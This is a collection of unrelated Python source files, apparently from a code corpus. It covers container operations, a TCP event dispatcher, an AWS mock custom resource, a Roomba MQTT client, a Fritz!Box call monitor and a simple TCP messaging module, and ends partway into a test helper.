class ParallelStreamWriter(object):
"""Write out messages for operations happening in parallel.
Each operation has its own line, and ANSI code characters are used
to jump to the correct line, and write over the line.
"""
noansi = False
lock = Lock()
instance = None
@classmethod
def set_noansi(cls, value=True):
cls.noansi = value
def __init__(self, stream):
self.stream = stream
self.lines = []
self.width = 0
ParallelStreamWriter.instance = self
def add_object(self, msg, obj_index):
if msg is None:
return
self.lines.append(msg + obj_index)
self.width = max(self.width, len(msg + ' ' + obj_index))
def write_initial(self, msg, obj_index):
if msg is None:
return
return self._write_noansi(msg, obj_index, '')
def _write_ansi(self, msg, obj_index, status):
self.lock.acquire()
position = self.lines.index(msg + obj_index)
diff = len(self.lines) - position
# move up
self.stream.write("%c[%dA" % (27, diff))
# erase
self.stream.write("%c[2K\r" % 27)
self.stream.write("{:<{width}} ... {}\r".format(msg + ' ' + obj_index,
status, width=self.width))
# move back down
self.stream.write("%c[%dB" % (27, diff))
self.stream.flush()
self.lock.release()
def _write_noansi(self, msg, obj_index, status):
self.stream.write(
"{:<{width}} ... {}\r\n".format(
msg + ' ' + obj_index, status, width=self.width
)
)
self.stream.flush()
def write(self, msg, obj_index, status, color_func):
if msg is None:
return
if self.noansi:
self._write_noansi(msg, obj_index, status)
else:
self._write_ansi(msg, obj_index, color_func(status))
def parallel_operation(containers, operation, options, message):
parallel_execute(
containers,
operator.methodcaller(operation, **options),
operator.attrgetter('name'),
message,
)
def parallel_remove(containers, options):
stopped_containers = [c for c in containers if not c.is_running]
parallel_operation(stopped_containers, 'remove', options, 'Removing')
def parallel_pause(containers, options):
parallel_operation(containers, 'pause', options, 'Pausing')
def parallel_unpause(containers, options):
parallel_operation(containers, 'unpause', options, 'Unpausing')
def parallel_kill(containers, options):
parallel_operation(containers, 'kill', options, 'Killing')
|
dispatcher.py
|
# (C) Copyright 1996-2018 ECMWF.
#
# This software is licensed under the terms of the Apache Licence Version 2.0
# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
# In applying this licence, ECMWF does not waive the privileges and immunities
# granted to it by virtue of its status as an intergovernmental organisation nor
# does it submit to any jurisdiction.
import queue
import logging
import multiprocessing
import socket
from datetime import datetime
from kronos_executor.kronos_events import EventFactory
logger = logging.getLogger(__name__)
class EventDispatcher(object):
"""
Class that dispatches Kronos events
"""
buffer_size = 4096
def __init__(self, queue, server_host='localhost', server_port=7363, sim_token=None):
"""
Setup the socket and bind it to the appropriate port
"""
# full address of the server
self.server_host = server_host
self.server_port = server_port
self.server_address = (server_host, server_port)
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# bind it to port and set it to listen status
self.sock.bind(self.server_address)
self.sock.listen(1024)
self.terminate = False
# Unique simulation hash
self.sim_token = sim_token
# listener process
self.listener_queue = queue
self.listener_proc = multiprocessing.Process(target=self._listen_for_messages)
# log of all events with timings taken upon msg reception
self.timed_events = []
def __str__(self):
return "KRONOS-DISPATCHER: host:{}, port:{} ".format(self.server_host, self.server_port)
def __bytes__(self):
return str(self).encode('utf-8')
def start(self):
"""
Start the process
:return:
"""
self.listener_proc.start()
def _listen_for_messages(self):
"""
Handles the incoming TCP events
:return:
"""
# keep accepting connections until all the jobs have completed
while True:
connection, client_address = self.sock.accept()
try:
msg = b""
# keep looping until there is data to be received..
while True:
data = connection.recv(self.buffer_size)
if data:
msg += data
else:
# store event and timestamp in the queue (and wait until there is space in the queue)
self.listener_queue.put((msg, datetime.now().timestamp()), block=True)
break
finally:
# ..and close the connection
connection.close()
def get_next_message(self):
return self.listener_queue.get()
def get_events_batch(self, batch_size=1):
"""
Get a batch of events
:param batch_size:
:return:
"""
_batch = []
queue_empty_reached = False
try:
while len(_batch) < batch_size:
# get msg and timestamp from the queue
(msg, msg_timestamp) = self.listener_queue.get(block=False)
kronos_event = EventFactory.from_string(msg, validate_event=False)
if kronos_event:
# Dispatch only legitimate messages (i.e. TOKEN present and correct)
if hasattr(kronos_event, "token"):
if str(kronos_event.token) == str(self.sim_token):
_batch.append(kronos_event)
self.timed_events.append((kronos_event, msg_timestamp))
else:
logger.warning("INCORRECT TOKEN {} => message discarded: {}".format(kronos_event.token, msg))
else:
# one last attempt to find the token
# TODO: ideally we would keep the check of the token at the top level only..
if hasattr(kronos_event, "info"):
if kronos_event.info.get("token", "") == str(self.sim_token):
_batch.append(kronos_event)
self.timed_events.append((kronos_event, msg_timestamp))
else:
logger.warning("TOKEN NOT found => message discarded: {}".format(msg))
else:
logger.warning("TOKEN NOT found => message discarded: {}".format(msg))
except queue.Empty:
queue_empty_reached = True
pass
return queue_empty_reached, _batch
def stop(self):
self.listener_proc.terminate()
|
custom_model.py
|
import json
import threading
from moto import settings
from moto.core.models import CloudFormationModel
from moto.awslambda import lambda_backends
from uuid import uuid4
class CustomModel(CloudFormationModel):
def __init__(self, region_name, request_id, logical_id, resource_name):
self.region_name = region_name
self.request_id = request_id
self.logical_id = logical_id
self.resource_name = resource_name
self.data = dict()
self._finished = False
def set_data(self, data):
self.data = data
self._finished = True
def is_created(self):
return self._finished
@property
def physical_resource_id(self):
return self.resource_name
@staticmethod
def cloudformation_type():
return "?"
@classmethod
def create_from_cloudformation_json(
cls, resource_name, cloudformation_json, region_name, **kwargs
):
logical_id = kwargs["LogicalId"]
stack_id = kwargs["StackId"]
resource_type = kwargs["ResourceType"]
properties = cloudformation_json["Properties"]
service_token = properties["ServiceToken"]
backend = lambda_backends[region_name]
fn = backend.get_function(service_token)
request_id = str(uuid4())
custom_resource = CustomModel(
region_name, request_id, logical_id, resource_name
)
from moto.cloudformation import cloudformation_backends
stack = cloudformation_backends[region_name].get_stack(stack_id)
stack.add_custom_resource(custom_resource)
# A request will be send to this URL to indicate success/failure
# This request will be coming from inside a Docker container
# Note that, in order to reach the Moto host, the Moto-server should be listening on 0.0.0.0
#
# Alternative: Maybe we should let the user pass in a container-name where Moto is running?
# Similar to how we know for sure that the container in our CI is called 'motoserver'
host = f"{settings.moto_server_host()}:{settings.moto_server_port()}"
response_url = (
f"{host}/cloudformation_{region_name}/cfnresponse?stack={stack_id}"
)
event = {
"RequestType": "Create",
"ServiceToken": service_token,
"ResponseURL": response_url,
"StackId": stack_id,
"RequestId": request_id,
"LogicalResourceId": logical_id,
"ResourceType": resource_type,
"ResourceProperties": properties,
}
invoke_thread = threading.Thread(
target=fn.invoke, args=(json.dumps(event), {}, {})
)
invoke_thread.start()
return custom_resource
@classmethod
def has_cfn_attr(cls, attr): # pylint: disable=unused-argument
# We don't know which attributes are supported for third-party resources
return True
def get_cfn_attribute(self, attribute_name):
if attribute_name in self.data:
return self.data[attribute_name]
return None
|
roomba.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Python 3.* (thanks to pschmitt for adding Python 3 compatibility).
Program to connect to Roomba 980 vacuum cleaner, dcode json, and forward to mqtt
server.
Nick Waterton 24th April 2017: V 1.0: Initial Release
Nick Waterton 4th July 2017 V 1.1.1: Fixed MQTT protocol version, and map
paths, fixed paho-mqtt tls changes
Nick Waterton 5th July 2017 V 1.1.2: Minor fixes, CV version 3 .2 support
Nick Waterton 7th July 2017 V1.2.0: Added -o option "roomOutline" allows
enabling/disabling of room outline drawing, added auto creation of css/html
files Nick Waterton 11th July 2017 V1.2.1: Quick (untested) fix for room
outlines if you don't have OpenCV
"""
import json
import logging
import threading
import time
from collections import OrderedDict
from collections.abc import Mapping
from datetime import datetime
from roombapy.const import ROOMBA_ERROR_MESSAGES, ROOMBA_STATES
MAX_CONNECTION_RETRIES = 3
class RoombaConnectionError(Exception):
"""Roomba connection exception."""
pass
class Roomba:
"""
This is a Class for Roomba 900 series WiFi connected Vacuum cleaners.
Requires firmware version 2.0 and above (not V1.0). Tested with Roomba 980
username (blid) and password are required, and can be found using the
password() class above (or can be auto discovered)
Most of the underlying info was obtained from here:
https://github.com/koalazak/dorita980 many thanks!
The values received from the Roomba as stored in a dictionay called
master_state, and can be accessed at any time, the contents are live, and
will build with time after connection.
This is not needed if the forward to mqtt option is used, as the events will
be decoded and published on the designated mqtt client topic.
"""
def __init__(self, remote_client, continuous=True, delay=1):
"""Roomba client initialization."""
self.log = logging.getLogger(__name__)
self.remote_client = remote_client
self._init_remote_client_callbacks()
self.continuous = continuous
if self.continuous:
self.log.debug("CONTINUOUS connection")
else:
self.log.debug("PERIODIC connection")
self.stop_connection = False
self.periodic_connection_running = False
self.topic = "#"
self.exclude = ""
self.delay = delay
self.periodic_connection_duration = 10
self.roomba_connected = False
self.indent = 0
self.master_indent = 0
self.co_ords = {"x": 0, "y": 0, "theta": 180}
self.cleanMissionStatus_phase = ""
self.previous_cleanMissionStatus_phase = ""
self.current_state = None
self.bin_full = False
self.master_state = {} # all info from roomba stored here
self.time = time.time()
self.update_seconds = 300 # update with all values every 5 minutes
self._thread = threading.Thread(target=self.periodic_connection)
self.on_message_callbacks = []
self.on_disconnect_callbacks = []
self.error_code = None
self.error_message = None
self.client_error = None
def register_on_message_callback(self, callback):
self.on_message_callbacks.append(callback)
def register_on_disconnect_callback(self, callback):
self.on_disconnect_callbacks.append(callback)
def _init_remote_client_callbacks(self):
self.remote_client.set_on_message(self.on_message)
self.remote_client.set_on_connect(self.on_connect)
self.remote_client.set_on_disconnect(self.on_disconnect)
def connect(self):
if self.roomba_connected or self.periodic_connection_running:
return
if self.continuous:
self._connect()
else:
self._thread.daemon = True
self._thread.start()
self.time = time.time() # save connection time
def _connect(self):
is_connected = self.remote_client.connect()
if not is_connected:
raise RoombaConnectionError(
"Unable to connect to Roomba at {}".format(
self.remote_client.address
)
)
return is_connected
def disconnect(self):
if self.continuous:
self.remote_client.disconnect()
else:
self.stop_connection = True
def periodic_connection(self):
# only one connection thread at a time!
if self.periodic_connection_running:
return
self.periodic_connection_running = True
while not self.stop_connection:
try:
self._connect()
except RoombaConnectionError as error:
self.periodic_connection_running = False
self.on_disconnect(error)
return
time.sleep(self.delay)
self.remote_client.disconnect()
self.periodic_connection_running = False
def on_connect(self, error):
self.log.info("Connecting to Roomba %s", self.remote_client.address)
self.client_error = error
if error is not None:
self.log.error(
"Roomba %s connection error, code %s",
self.remote_client.address,
error,
)
return
self.roomba_connected = True
self.remote_client.subscribe(self.topic)
def on_disconnect(self, error):
self.roomba_connected = False
self.client_error = error
if error is not None:
self.log.warning(
"Unexpectedly disconnected from Roomba %s, code %s",
self.remote_client.address,
error,
)
# call the callback functions
for callback in self.on_disconnect_callbacks:
callback(error)
return
self.log.info("Disconnected from Roomba %s", self.remote_client.address)
def on_message(self, mosq, obj, msg):
if self.exclude != "":
if self.exclude in msg.topic:
return
if self.indent == 0:
self.master_indent = max(self.master_indent, len(msg.topic))
log_string, json_data = self.decode_payload(msg.topic, msg.payload)
self.dict_merge(self.master_state, json_data)
self.log.debug(
"Received Roomba Data %s: %s, %s",
self.remote_client.address,
str(msg.topic),
str(msg.payload),
)
self.decode_topics(json_data)
# default every 5 minutes
if time.time() - self.time > self.update_seconds:
self.log.debug(
"Publishing master_state %s", self.remote_client.address
)
self.decode_topics(self.master_state) # publish all values
self.time = time.time()
# call the callback functions
for callback in self.on_message_callbacks:
callback(json_data)
def send_command(self, command, params=None):
if params is None:
params = {}
self.log.debug("Send command: %s", command)
roomba_command = {
"command": command,
"time": int(datetime.timestamp(datetime.now())),
"initiator": "localApp",
}
roomba_command.update(params)
str_command = json.dumps(roomba_command)
self.log.debug("Publishing Roomba Command : %s", str_command)
self.remote_client.publish("cmd", str_command)
def set_preference(self, preference, setting):
self.log.debug("Set preference: %s, %s", preference, setting)
val = setting
# Parse boolean string
if isinstance(setting, str):
if setting.lower() == "true":
val = True
elif setting.lower() == "false":
val = False
tmp = {preference: val}
roomba_command = {"state": tmp}
str_command = json.dumps(roomba_command)
self.log.debug("Publishing Roomba Setting : %s" % str_command)
self.remote_client.publish("delta", str_command)
def dict_merge(self, dct, merge_dct):
"""
Recursive dict merge.
Inspired by :meth:``dict.update()``, instead
of updating only top-level keys, dict_merge recurses down into dicts
nested to an arbitrary depth, updating keys. The ``merge_dct`` is
merged into ``dct``.
:param dct: dict onto which the merge is executed
:param merge_dct: dct merged into dct
:return: None
"""
for k, v in merge_dct.items():
if (
k in dct
and isinstance(dct[k], dict)
and isinstance(merge_dct[k], Mapping)
):
self.dict_merge(dct[k], merge_dct[k])
else:
dct[k] = merge_dct[k]
def decode_payload(self, topic, payload):
"""
Format json for pretty printing.
Returns string sutiable for logging, and a dict of the json data
"""
indent = self.master_indent + 31 # number of spaces to indent json data
json_data = None
try:
# if it's json data, decode it (use OrderedDict to preserve keys
# order), else return as is...
json_data = json.loads(
payload.decode("utf-8")
.replace(":nan", ":NaN")
.replace(":inf", ":Infinity")
.replace(":-inf", ":-Infinity"),
object_pairs_hook=OrderedDict,
)
# if it's not a dictionary, probably just a number
if not isinstance(json_data, dict):
return json_data, dict(json_data)
json_data_string = "\n".join(
(indent * " ") + i
for i in (json.dumps(json_data, indent=2)).splitlines()
)
formatted_data = "Decoded JSON: \n%s" % json_data_string
except ValueError:
formatted_data = payload
return formatted_data, dict(json_data)
def decode_topics(self, state, prefix=None):
"""
Decode json data dict and publish as individual topics.
Publish to brokerFeedback/topic the keys are concatinated with _
to make one unique topic name strings are expressely converted
to strings to avoid unicode representations
"""
for key, value in state.items():
if isinstance(value, dict):
if prefix is None:
self.decode_topics(value, key)
else:
self.decode_topics(value, prefix + "_" + key)
else:
if isinstance(value, list):
newlist = []
for i in value:
if isinstance(i, dict):
for ki, vi in i.items():
newlist.append((str(ki), vi))
else:
if isinstance(i, str):
i = str(i)
newlist.append(i)
value = newlist
if prefix is not None:
key = prefix + "_" + key
# all data starts with this, so it's redundant
key = key.replace("state_reported_", "")
# save variables for drawing map
if key == "pose_theta":
self.co_ords["theta"] = value
if key == "pose_point_x": # x and y are reversed...
self.co_ords["y"] = value
if key == "pose_point_y":
self.co_ords["x"] = value
if key == "bin_full":
self.bin_full = value
if key == "cleanMissionStatus_error":
try:
self.error_code = value
self.error_message = ROOMBA_ERROR_MESSAGES[value]
except KeyError as e:
self.log.warning(
"Error looking up Roomba error message: %s", e
)
self.error_message = "Unknown Error number: %s" % value
if key == "cleanMissionStatus_phase":
self.previous_cleanMissionStatus_phase = (
self.cleanMissionStatus_phase
)
self.cleanMissionStatus_phase = value
if prefix is None:
self.update_state_machine()
def update_state_machine(self, new_state=None):
"""
Roomba progresses through states (phases).
Normal Sequence is "" -> charge -> run -> hmPostMsn -> charge
Mid mission recharge is "" -> charge -> run -> hmMidMsn -> charge
-> run -> hmPostMsn -> charge
Stuck is "" -> charge -> run -> hmPostMsn -> stuck
-> run/charge/stop/hmUsrDock -> charge
Start program during run is "" -> run -> hmPostMsn -> charge
Need to identify a new mission to initialize map, and end of mission to
finalise map.
Assume charge -> run = start of mission (init map)
stuck - > charge = init map
Assume hmPostMsn -> charge = end of mission (finalize map)
Anything else = continue with existing map
"""
current_mission = self.current_state
try:
if (
self.master_state["state"]["reported"]["cleanMissionStatus"][
"mssnM"
]
== "none"
and self.cleanMissionStatus_phase == "charge"
and (
self.current_state == ROOMBA_STATES["pause"]
or self.current_state == ROOMBA_STATES["recharge"]
)
):
self.current_state = ROOMBA_STATES["cancelled"]
except KeyError:
pass
if (
self.current_state == ROOMBA_STATES["charge"]
and self.cleanMissionStatus_phase == "run"
):
self.current_state = ROOMBA_STATES["new"]
elif (
self.current_state == ROOMBA_STATES["run"]
and self.cleanMissionStatus_phase == "hmMidMsn"
):
self.current_state = ROOMBA_STATES["dock"]
elif (
self.current_state == ROOMBA_STATES["dock"]
and self.cleanMissionStatus_phase == "charge"
):
self.current_state = ROOMBA_STATES["recharge"]
elif (
self.current_state == ROOMBA_STATES["recharge"]
and self.cleanMissionStatus_phase == "charge"
and self.bin_full
):
self.current_state = ROOMBA_STATES["pause"]
elif (
self.current_state == ROOMBA_STATES["run"]
and self.cleanMissionStatus_phase == "charge"
):
self.current_state = ROOMBA_STATES["recharge"]
elif (
self.current_state == ROOMBA_STATES["recharge"]
and self.cleanMissionStatus_phase == "run"
):
self.current_state = ROOMBA_STATES["pause"]
elif (
self.current_state == ROOMBA_STATES["pause"]
and self.cleanMissionStatus_phase == "charge"
):
self.current_state = ROOMBA_STATES["pause"]
# so that we will draw map and can update recharge time
current_mission = None
elif (
self.current_state == ROOMBA_STATES["charge"]
and self.cleanMissionStatus_phase == "charge"
):
# so that we will draw map and can update charge status
current_mission = None
elif (
self.current_state == ROOMBA_STATES["stop"]
or self.current_state == ROOMBA_STATES["pause"]
) and self.cleanMissionStatus_phase == "hmUsrDock":
self.current_state = ROOMBA_STATES["cancelled"]
elif (
self.current_state == ROOMBA_STATES["hmUsrDock"]
or self.current_state == ROOMBA_STATES["cancelled"]
) and self.cleanMissionStatus_phase == "charge":
self.current_state = ROOMBA_STATES["dockend"]
elif (
self.current_state == ROOMBA_STATES["hmPostMsn"]
and self.cleanMissionStatus_phase == "charge"
):
self.current_state = ROOMBA_STATES["dockend"]
elif (
self.current_state == ROOMBA_STATES["dockend"]
and self.cleanMissionStatus_phase == "charge"
):
self.current_state = ROOMBA_STATES["charge"]
else:
if self.cleanMissionStatus_phase not in ROOMBA_STATES:
self.log.error(
"Can't find state %s in predefined Roomba states, "
"please create a new issue: "
"https://github.com/pschmitt/roombapy/issues/new",
self.cleanMissionStatus_phase,
)
self.current_state = None
else:
self.current_state = ROOMBA_STATES[
self.cleanMissionStatus_phase
]
if new_state is not None:
self.current_state = ROOMBA_STATES[new_state]
self.log.debug("Current state: %s", self.current_state)
if self.current_state != current_mission:
self.log.debug("State updated to: %s", self.current_state)
|
fritzbox_callmonitor.py
|
"""
A sensor to monitor incoming and outgoing phone calls on a Fritz!Box router.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.fritzbox_callmonitor/
"""
import logging
import socket
import threading
import datetime
import time
import re
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (CONF_HOST, CONF_PORT, CONF_NAME,
CONF_PASSWORD, CONF_USERNAME,
EVENT_HOMEASSISTANT_STOP)
from homeassistant.helpers.entity import Entity
import homeassistant.helpers.config_validation as cv
from homeassistant.util import Throttle
REQUIREMENTS = ['fritzconnection==0.6.5']
_LOGGER = logging.getLogger(__name__)
CONF_PHONEBOOK = 'phonebook'
CONF_PREFIXES = 'prefixes'
DEFAULT_HOST = '169.254.1.1' # IP valid for all Fritz!Box routers
DEFAULT_NAME = 'Phone'
DEFAULT_PORT = 1012
INTERVAL_RECONNECT = 60
VALUE_CALL = 'dialing'
VALUE_CONNECT = 'talking'
VALUE_DEFAULT = 'idle'
VALUE_DISCONNECT = 'idle'
VALUE_RING = 'ringing'
# Return cached results if phonebook was downloaded less then this time ago.
MIN_TIME_PHONEBOOK_UPDATE = datetime.timedelta(hours=6)
SCAN_INTERVAL = datetime.timedelta(hours=3)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_HOST, default=DEFAULT_HOST): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_PASSWORD, default='admin'): cv.string,
vol.Optional(CONF_USERNAME, default=''): cv.string,
vol.Optional(CONF_PHONEBOOK, default=0): cv.positive_int,
vol.Optional(CONF_PREFIXES, default=[]):
vol.All(cv.ensure_list, [cv.string])
})
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up Fritz!Box call monitor sensor platform."""
name = config.get(CONF_NAME)
host = config.get(CONF_HOST)
port = config.get(CONF_PORT)
username = config.get(CONF_USERNAME)
password = config.get(CONF_PASSWORD)
phonebook_id = config.get('phonebook')
prefixes = config.get('prefixes')
try:
phonebook = FritzBoxPhonebook(
host=host, port=port, username=username, password=password,
phonebook_id=phonebook_id, prefixes=prefixes)
except: # noqa: E722 pylint: disable=bare-except
phonebook = None
_LOGGER.warning("Phonebook with ID %s not found on Fritz!Box",
phonebook_id)
sensor = FritzBoxCallSensor(name=name, phonebook=phonebook)
add_devices([sensor])
monitor = FritzBoxCallMonitor(host=host, port=port, sensor=sensor)
monitor.connect()
def _stop_listener(_event):
monitor.stopped.set()
hass.bus.listen_once(
EVENT_HOMEASSISTANT_STOP,
_stop_listener
)
return monitor.sock is not None
class FritzBoxCallSensor(Entity):
"""Implementation of a Fritz!Box call monitor."""
def __init__(self, name, phonebook):
"""Initialize the sensor."""
self._state = VALUE_DEFAULT
self._attributes = {}
self._name = name
self.phonebook = phonebook
def set_state(self, state):
"""Set the state."""
self._state = state
def set_attributes(self, attributes):
"""Set the state attributes."""
self._attributes = attributes
@property
def should_poll(self):
"""Only poll to update phonebook, if defined."""
return self.phonebook is not None
@property
def state(self):
"""Return the state of the device."""
return self._state
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def device_state_attributes(self):
"""Return the state attributes."""
return self._attributes
def number_to_name(self, number):
"""Return a name for a given phone number."""
if self.phonebook is None:
return 'unknown'
return self.phonebook.get_name(number)
def update(self):
"""Update the phonebook if it is defined."""
if self.phonebook is not None:
self.phonebook.update_phonebook()
class FritzBoxCallMonitor:
"""Event listener to monitor calls on the Fritz!Box."""
def __init__(self, host, port, sensor):
"""Initialize Fritz!Box monitor instance."""
self.host = host
self.port = port
self.sock = None
self._sensor = sensor
self.stopped = threading.Event()
def connect(self):
"""Connect to the Fritz!Box."""
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(10)
try:
self.sock.connect((self.host, self.port))
threading.Thread(target=self._listen).start()
except socket.error as err:
self.sock = None
_LOGGER.error("Cannot connect to %s on port %s: %s",
self.host, self.port, err)
def _listen(self):
"""Listen to incoming or outgoing calls."""
while not self.stopped.isSet():
try:
response = self.sock.recv(2048)
except socket.timeout:
# if no response after 10 seconds, just recv again
continue
response = str(response, "utf-8")
if not response:
# if the response is empty, the connection has been lost.
# try to reconnect
self.sock = None
while self.sock is None:
self.connect()
time.sleep(INTERVAL_RECONNECT)
else:
line = response.split("\n", 1)[0]
self._parse(line)
time.sleep(1)
return
def _parse(self, line):
"""Parse the call information and set the sensor states."""
line = line.split(";")
df_in = "%d.%m.%y %H:%M:%S"
df_out = "%Y-%m-%dT%H:%M:%S"
isotime = datetime.datetime.strptime(line[0], df_in).strftime(df_out)
if line[1] == "RING":
self._sensor.set_state(VALUE_RING)
att = {"type": "incoming",
"from": line[3],
"to": line[4],
"device": line[5],
"initiated": isotime}
att["from_name"] = self._sensor.number_to_name(att["from"])
self._sensor.set_attributes(att)
elif line[1] == "CALL":
self._sensor.set_state(VALUE_CALL)
att = {"type": "outgoing",
"from": line[4],
"to": line[5],
"device": line[6],
"initiated": isotime}
att["to_name"] = self._sensor.number_to_name(att["to"])
self._sensor.set_attributes(att)
elif line[1] == "CONNECT":
self._sensor.set_state(VALUE_CONNECT)
att = {"with": line[4], "device": line[3], "accepted": isotime}
att["with_name"] = self._sensor.number_to_name(att["with"])
self._sensor.set_attributes(att)
elif line[1] == "DISCONNECT":
self._sensor.set_state(VALUE_DISCONNECT)
att = {"duration": line[3], "closed": isotime}
self._sensor.set_attributes(att)
self._sensor.schedule_update_ha_state()
class FritzBoxPhonebook:
"""This connects to a FritzBox router and downloads its phone book."""
def __init__(self, host, port, username, password,
phonebook_id=0, prefixes=None):
"""Initialize the class."""
self.host = host
self.username = username
self.password = password
self.port = port
self.phonebook_id = phonebook_id
self.phonebook_dict = None
self.number_dict = None
self.prefixes = prefixes or []
# pylint: disable=import-error
import fritzconnection as fc
# Establish a connection to the FRITZ!Box.
self.fph = fc.FritzPhonebook(
address=self.host, user=self.username, password=self.password)
if self.phonebook_id not in self.fph.list_phonebooks:
raise ValueError("Phonebook with this ID not found.")
self.update_phonebook()
@Throttle(MIN_TIME_PHONEBOOK_UPDATE)
def update_phonebook(self):
"""Update the phone book dictionary."""
self.phonebook_dict = self.fph.get_all_names(self.phonebook_id)
self.number_dict = {re.sub(r'[^\d\+]', '', nr): name
for name, nrs in self.phonebook_dict.items()
for nr in nrs}
_LOGGER.info("Fritz!Box phone book successfully updated")
def get_name(self, number):
"""Return a name for a given phone number."""
number = re.sub(r'[^\d\+]', '', str(number))
if self.number_dict is None:
return 'unknown'
try:
return self.number_dict[number]
except KeyError:
pass
if self.prefixes:
for prefix in self.prefixes:
try:
return self.number_dict[prefix + number]
except KeyError:
pass
try:
return self.number_dict[prefix + number.lstrip('0')]
except KeyError:
pass
return 'unknown'
|
main.py
|
from modules.Alfa.alfa import Alfa
import threading
import sys
alfa = Alfa()
if __name__ == "__main__":
try:
thread = threading.Thread(target=alfa.reciveData)
thread.daemon = True
thread.start()
alfa.sendData()
except KeyboardInterrupt:
sys.exit(0)
|
netcom.py
|
#!/usr/bin/python
import SocketServer, socket
import threading, Queue
import hashlib, netaddr
import argparse
class Communicator:
"""The communication module of the server, handling receipt and transmission of data over the network with a SocketServer and verifying messages with an md5 hash."""
# NOTE/TODO: This data is sent UNENCRYPTED over the network. To secure the communiation channel, use TLS/SSL (e.g. ssl or, probably, OpenSSL)
def __init__(self, port=49450, dest='localhost'):
self.port = port
self.dest = dest
self.rxMsgs = Queue.Queue() # messages that have been received by the server
self.txMsgs = Queue.Queue() # messages that have been transmitted by the server
self.authorizedHostNets = ['127.0.0.1/32', # hosts that are authorized to communicate with this server (CIDR or glob notation)
'192.168.1.0/24',
'10.179.1.0/24']
self.get_authorized_hosts_list()
self.isListening = False
#self.recipients = [] # list of previous message recipients (as (host, port) tuples)
def __del__(self):
if self.isListening:
self.stop_listening()
def add_authorized_host(self,netstr):
self.authorizedHostNets.append(netstr)
self.get_authorized_hosts_list()
def remove_authorized_host(self,netstr):
while netstr in self.authorizedHostNets:
self.authorizedHostNets.remove(netstr)
self.get_authorized_hosts_list()
def get_authorized_hosts_list(self):
self.authorizedHosts = []
for ahn in self.authorizedHostNets:
netstr = netaddr.glob_to_cidrs(ahn)[0] if '*' in ahn else ahn
self.authorizedHosts.append(netaddr.IPNetwork(netstr))
def listen(self):
"""Starts a listener thread that reads and processes messages."""
SocketServer.TCPServer.allow_reuse_address = True
self.server = self.NetComTCPServer(('',self.port), self.TCPHandler)
self.server.authorizedHosts = self.authorizedHosts
self.server.rxMsgs = self.rxMsgs
self.serverThread = threading.Thread(target=self.server.serve_forever)
self.serverThread.start()
self.isListening = True
print "Listening on port {}...".format(self.port)
def stop_listening(self):
self.server.shutdown()
self.server.server_close()
self.isListening = False
def print_messages_received(self):
print "Messages received on port {}".format(self.port)
print "=========================================="
while True:
try:
data = self.rxMsgs.get_nowait()
print data
except Queue.Empty:
# no data available, don't do anything
pass
def talk(self, msg, dest='', port=-1, printSuccess=False):
"""Send a message to another Communicator and verify transmission."""
port = self.port if port == -1 else port # use the same port unless the other host needs us to use a different one (why? do we need to do this?)
dest = self.dest if dest == '' else dest
self.lastRecipient = (dest, port)
self.success = False
try:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect(self.lastRecipient)
self.sock.sendall(msg)
self.response = self.sock.recv(1024)
#print "Message hash: {}".format(hashlib.md5(msg).hexdigest())
#print "Response hash: {}".format(self.response)
if self.response == hashlib.md5(msg).hexdigest():
self.success = True
except socket.error as sockErr:
if sockErr.errno == 104:
print "Error! Message refused by host {}! Make sure you are authorized!".format(dest)
finally:
self.sock.close()
if self.success and printSuccess:
print "Message successfully delivered!"
elif printSuccess:
print "Uh-oh...I couldn\'t deliver the message!"
return self.success
class NetComTCPServer(SocketServer.TCPServer):
"""Server class for the SocketServer (to add some verification, etc.).
"""
def verify_request(self,request,client_address):
for ahn in self.authorizedHosts:
if client_address[0] in ahn:
return True
print "Message received from unauthorized host {}!".format(client_address)
return False
class TCPHandler(SocketServer.BaseRequestHandler):
"""RequestHandler class for the SocketServer.
"""
def handle(self):
# reads data from the client and puts it in the Queue rxMsgs to be processed by the program
self.data = self.request.recv(1024) # read data from client
self.server.rxMsgs.put(self.data) # put the data in the queue for other methods to read it
self.request.sendall(hashlib.md5(self.data).hexdigest()) # send back the md5 hash for verification
if __name__ == "__main__":
parser = argparse.ArgumentParser(prog='netcom.py', usage='%(prog)s [options] [message]', description='Program/module for insecure TCP communication over a network. (TLS Coming soon...).', epilog = 'When run as a script with no arguments, starts a server on the default port and listens for messages, printing them to the screen. When run with positional arguments, reads them as words of a message to send to msgDest.')
parser.add_argument('-p', '--port', dest = 'port', type = int, default = 49450, help = 'TCP port to use, (default %(default)s).')
parser.add_argument('-d', '--dest', '--destination', dest = 'msgDest', default = 'localhost', help = 'The hostname/IP of the message destination (default %(default)s).')
parser.add_argument('message', nargs=argparse.REMAINDER, help = 'The message to send to msgDest.')
args = parser.parse_args()
if len(args.message) > 0:
msg = " ".join(args.message)
com = Communicator(args.port)
com.talk(msg,dest=args.msgDest)
else:
# if in server mode, start the server and listen, stopping if they press Ctrl+C
print "Starting server..."
com = Communicator(args.port)
try:
com.listen()
com.print_messages_received()
except KeyboardInterrupt:
print "Stopping server..."
com.stop_listening()
|
parallel.py
|
import datetime
import logging
import os
import shutil
import tempfile
import signal
from multiprocessing import Process, Manager
from tests.common.helpers.assertions import pytest_assert as pt_assert
logger = logging.getLogger(__name__)
def parallel_run(target, args, kwargs, nodes, timeout=None):
"""Run target function on nodes in parallel
Args:
target (function): The target function to be executed in parallel.
args (list of tuple): List of arguments for the target function.
kwargs (dict): Keyword arguments for the target function. It will be extended with two keys: 'node' and
'results'. The 'node' key will hold an item of the nodes list. The 'result' key will hold an instance of
multiprocessing.Manager().dict(). It is a proxy of the shared dict that will be used by each process for
returning execution results.
nodes (list of nodes): List of nodes to be used by the target function
timeout (int or float, optional): Total time allowed for the spawned multiple processes to run. Defaults to
